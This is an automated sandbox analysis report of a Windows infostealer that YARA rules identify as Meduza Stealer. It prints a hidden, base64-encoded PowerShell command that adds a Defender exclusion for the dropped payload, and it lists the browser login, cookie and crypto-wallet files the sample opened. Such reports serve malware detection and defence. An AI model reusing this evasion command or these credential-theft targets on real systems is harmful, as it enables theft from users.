Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: sUKFphHSzX.exe, 00000009.00000002.1753788629.0000020931A1C000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1751118200.0000020931A1C000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1752860853.0000020931A1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft-hyper-v-drivers-migration-replacement.manman
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	API call chain: ExitProcess graph end node			graph_9-74635
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	API call chain: ExitProcess graph end node			graph_9-74630

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_00000209335643F0 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,

9_2_00000209335643F0

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_000002093359BB14 GetLastError,IsDebuggerPresent,OutputDebugStringW,

9_2_000002093359BB14

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_000002093359BB14 GetLastError,IsDebuggerPresent,OutputDebugStringW,

9_2_000002093359BB14

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_000002093351B820 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_000002093351B820

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335B22D8 SetUnhandledExceptionFilter,	9_2_00000209335B22D8
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093356F920 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000002093356F920
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA500B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00007FF6CFA500B0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA5D180 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00007FF6CFA5D180

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\brok\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe'
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\brok\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe'			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_00000209335551E0 ShellExecuteW,

9_2_00000209335551E0

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==			Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe "C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe"			Jump to behavior

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwaygbyag8aawbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwawgbyaeyazabqahkabqbiadeacgbcahmavqblaeyacaboaegauwb6afgalgblahgazqanaa==
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwaygbyag8aawbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwawgbyaeyazabqahkabqbiadeacgbcahmavqblaeyacaboaegauwb6afgalgblahgazqanaa==			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: GetLocaleInfoEx,FormatMessageA,	9_2_0000020933599480
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: EnumSystemLocalesW,	9_2_0000020933587340
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: EnumSystemLocalesW,	9_2_0000020933587270
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: GetLocaleInfoW,	9_2_000002093357C1A8
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_0000020933587778
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: EnumSystemLocalesW,	9_2_000002093357BC68
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	9_2_000002093358795C
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	9_2_0000020933586F14

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Queries volume information: C:\Users\user\Desktop\HZ1BUCfTne.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation TimeZoneKeyName

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_0000020933576718 GetSystemTimeAsFileTime,

9_2_0000020933576718

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_0000020933560110 GetUserNameW,

9_2_0000020933560110

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_000002093358114C _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

9_2_000002093358114C

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected CredGrabber

Source: Yara match

File source: Process Memory Space: sUKFphHSzX.exe PID: 1440, type: MEMORYSTR

Yara detected Meduza Stealer

Source: Yara match	File source: 9.2.sUKFphHSzX.exe.209334e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sUKFphHSzX.exe.209334e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sUKFphHSzX.exe PID: 1440, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: sUKFphHSzX.exe, 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum\wallets
Source: sUKFphHSzX.exe, 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectronCash\config
Source: sUKFphHSzX.exe, 00000009.00000003.1716852767.00000209374EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "software": "Ny1aaXAgMjMuMDEgKHg2NCkgWzIzLjAxXQpNb3ppbGxhIEZpcmVmb3ggKHg2NCBlbi1VUykgWzExOC4wLjFdCk1vemlsbGEgTWFpbnRlbmFuY2UgU2VydmljZSBbMTE4LjAuMV0KTWljcm9zb2Z0IE9mZmljZSBQcm9mZXNzaW9uYWwgUGx1cyAyMDE5IC0gZW4tdXMgWzE2LjAuMTY4MjcuMjAxMzBdCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMjIgWDY0IEFkZGl0aW9uYWwgUnVudGltZSAtIDE0LjM2LjMyNTMyIFsxNC4zNi4zMjUzMl0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBMaWNlbnNpbmcgQ29tcG9uZW50IFsxNi4wLjE2ODI3LjIwMTMwXQpPZmZpY2UgMTYgQ2xpY2stdG8tUnVuIEV4dGVuc2liaWxpdHkgQ29tcG9uZW50IDY0LWJpdCBSZWdpc3RyYXRpb24gWzE2LjAuMTY4MjcuMjAwNTZdCkFkb2JlIEFjcm9iYXQgKDY0LWJpdCkgWzIzLjAwNi4yMDMyMF0KTWljcm9zb2Z0IFZpc3VhbCBDKysgMjAyMiBYNjQgTWluaW11bSBSdW50aW1lIC0gMTQuMzYuMzI1MzIgWzE0LjM2LjMyNTMyXQpHb29nbGUgQ2hyb21lIFsxMTcuMC41OTM4LjE0OV0KTWljcm9zb2Z0IEVkZ2UgWzExNy4wLjIwNDUuNDddCk1pY3Jvc29mdCBFZGdlIFVwZGF0ZSBbMS4zLjE3Ny4xMV0KTWljcm9zb2Z0IEVkZ2UgV2ViVmlldzIgUnVudGltZSBbMTE3LjAuMjA0NS40N10KSmF2YSBBdXRvIFVwZGF0ZXIgWzIuOC4zODEuOV0KSmF2YSA4IFVwZGF0ZSAzODEgWzguMC4zODEwLjldCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMTUtMjAyMiBSZWRpc3RyaWJ1dGFibGUgKHg2NCkgLSAxNC4zNi4zMjUzMiBbMTQuMzYuMzI1MzIuMF0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBFeHRlbnNpYmlsaXR5IENvbXBvbmVudCBbMTYuMC4xNjgyNy4yMDEzMF0K",
Source: sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus
Source: sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: sUKFphHSzX.exe, 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum\keystore
Source: powershell.exe, 00000003.00000002.1536380808.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match

File source: Process Memory Space: sUKFphHSzX.exe PID: 1440, type: MEMORYSTR

Remote Access Functionality

Yara detected CredGrabber

Source: Yara match

File source: Process Memory Space: sUKFphHSzX.exe PID: 1440, type: MEMORYSTR

Yara detected Meduza Stealer

Source: Yara match	File source: 9.2.sUKFphHSzX.exe.209334e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sUKFphHSzX.exe.209334e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sUKFphHSzX.exe PID: 1440, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
